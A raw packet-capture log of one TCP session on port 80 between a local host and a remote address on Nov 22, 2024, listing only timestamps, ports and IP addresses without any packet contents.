Nov 22, 2024 20:35:04.855901003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.857587099 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.977868080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.300010920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.300236940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:05.317864895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:05.317938089 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:05.437417030 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.437482119 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.437597036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.437664986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.437735081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.437822104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:05.437880993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:06.416856050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:06.417033911 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:06.669553995 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:06.794548035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.118632078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.118680000 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.118819952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.118819952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.120942116 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.121000051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.121032953 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.121053934 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.129671097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.129746914 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.129828930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.129888058 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.138427973 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.138508081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.138519049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.138612986 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.147197008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.147277117 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.147375107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.147442102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.155982971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.156131029 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.156294107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.156294107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.243413925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.243494987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.243510962 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.243594885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.247798920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.247869968 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.249303102 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.249367952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.249587059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.249645948 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.258048058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.258088112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.258167982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.266741991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.266799927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.266814947 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.266848087 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.275440931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.275517941 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.310516119 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.310581923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.310590982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.310671091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.314887047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.315015078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.316482067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.316541910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.316596031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.316664934 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.325370073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.325433969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.325459003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.325505018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.333867073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.333945036 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.333980083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.334033012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.342535973 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.342603922 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.342616081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.342663050 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.351305008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.351398945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.351419926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.351465940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.359971046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.360038042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.368012905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.368036032 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.368094921 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.372353077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.372452974 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.373928070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.374011993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.374048948 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.374108076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.382626057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.382700920 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.382729053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.382776976 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.391537905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.391588926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.391618013 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.391690016 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.398443937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.398516893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.435482979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.435606956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.435661077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.435720921 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.438402891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.438474894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.439541101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.439610004 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.439637899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.439701080 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.445725918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.445817947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.445899010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.451838970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.451942921 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.451942921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.452008963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.457937956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.458030939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.458079100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.458148003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.464052916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.464154959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.464179993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.464231014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.470220089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.470292091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.470323086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.470386028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.476299047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.476336002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.476366043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.476413012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.482410908 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.482490063 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.482532024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.482585907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.502494097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.502577066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.502598047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.502655983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.504224062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.504291058 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.504811049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.504868984 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.504918098 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.504975080 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.508222103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.508332968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.508347034 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.508387089 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.511619091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.511657000 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.511691093 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.511723995 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.514909983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.514978886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.515086889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.515155077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.518292904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.518409967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.518420935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.518474102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.521653891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.521720886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.521815062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.521887064 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.525012016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.525084972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.525150061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.525224924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.528398991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.528520107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.528606892 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.528673887 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.531769037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.531848907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.531877041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.531940937 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.560277939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.560362101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.560395956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.560450077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.561923027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.562031031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.562160969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.565267086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.565339088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.565480947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.565572977 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.568584919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.568661928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.568696022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.568757057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.571907997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.571980000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.572041035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.572128057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.575284004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.575351954 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.575392008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.575468063 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.578541040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.578578949 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.578605890 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.578640938 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.627450943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.627491951 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.627562046 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.627623081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.628216028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.628284931 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.628329039 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.628397942 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.631427050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.631479979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.631509066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.631541014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.634427071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.634510994 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.634541035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.634618044 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.637368917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.637420893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.637451887 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.637490988 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.640461922 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.640538931 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.640549898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.640618086 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.643376112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.643451929 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.643460035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.643508911 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.646163940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.646255016 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.646332026 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.646397114 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.648884058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.648952007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.649005890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.649070024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.651465893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.651526928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.651592016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.651654959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.653951883 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.654027939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.654114008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.654179096 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.656367064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.656471968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.656493902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.656527996 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.658843040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.658919096 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.658924103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.658982992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.661165953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.661245108 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.661247015 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.661355972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.663420916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.663520098 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.663521051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.663580894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.665765047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.665858984 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.665879965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.665949106 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.668103933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.668201923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.668262005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.668333054 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.670418978 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.670486927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.670512915 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.670538902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.695333004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.695404053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.695447922 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.695483923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.696449995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.696532011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.696619034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.696692944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.698544979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.698652029 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.698685884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.698755980 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.700674057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.700778008 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.701046944 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.701114893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.702775002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.702838898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.703134060 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.703203917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.704921007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.705009937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.705023050 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.705142975 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.707026005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.707128048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.707165956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.707200050 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.709053040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.709136009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.709165096 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.709193945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.711205006 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.711261988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.711325884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.711369038 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.713068962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.713162899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.713164091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.713232040 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.715121984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.715182066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.715259075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.715339899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.717293024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.717375040 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.717467070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.717533112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.719156981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.719249964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.719295979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.719364882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:07.721239090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:07.721313953 CET	49730	80	192.168.2.4	185.215.113.206
